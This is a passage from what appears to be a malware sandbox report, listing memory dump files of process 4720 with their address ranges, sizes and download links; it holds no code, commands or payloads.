          1.6MB

          Download
        • memory/4720-152-0x0000000077630000-0x00000000777D3000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4720-150-0x0000000077630000-0x00000000777D3000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4720-149-0x00007FFE26C50000-0x00007FFE26E45000-memory.dmp
          Filesize

          2.0MB

          Download
        • memory/4720-148-0x0000000008650000-0x000000000CA7F000-memory.dmp
          Filesize

          68.2MB

          Download
        • memory/4720-147-0x000000000D030000-0x000000000D5D4000-memory.dmp
          Filesize

          5.6MB

          Download
        • memory/4720-146-0x00000000079B0000-0x00000000079D2000-memory.dmp
          Filesize

          136KB

          Download
        • memory/4720-145-0x0000000007A20000-0x0000000007AB6000-memory.dmp
          Filesize

          600KB

          Download
        • memory/4720-144-0x00000000078B0000-0x00000000078CA000-memory.dmp
          Filesize

          104KB

          Download
        • memory/4720-143-0x0000000007FD0000-0x000000000864A000-memory.dmp
          Filesize

          6.5MB

          Download
        • memory/4720-166-0x0000000008650000-0x000000000CA7F000-memory.dmp
          Filesize

          68.2MB

          Download
        • memory/4720-167-0x0000000077630000-0x00000000777D3000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4720-141-0x0000000005A30000-0x0000000005A96000-memory.dmp
          Filesize

          408KB

          Download
        • memory/4720-140-0x0000000005950000-0x00000000059B6000-memory.dmp
          Filesize

          408KB

          Download
        • memory/4720-139-0x00000000058B0000-0x00000000058D2000-memory.dmp
          Filesize

          136KB

          Download
        • memory/4720-137-0x0000000005B10000-0x0000000006138000-memory.dmp
          Filesize

          6.2MB

          Download
        • memory/4720-136-0x0000000002E70000-0x0000000002EA6000-memory.dmp
          Filesize

          216KB

          Download
        • memory/4720-135-0x0000000000000000-mapping.dmp
          Download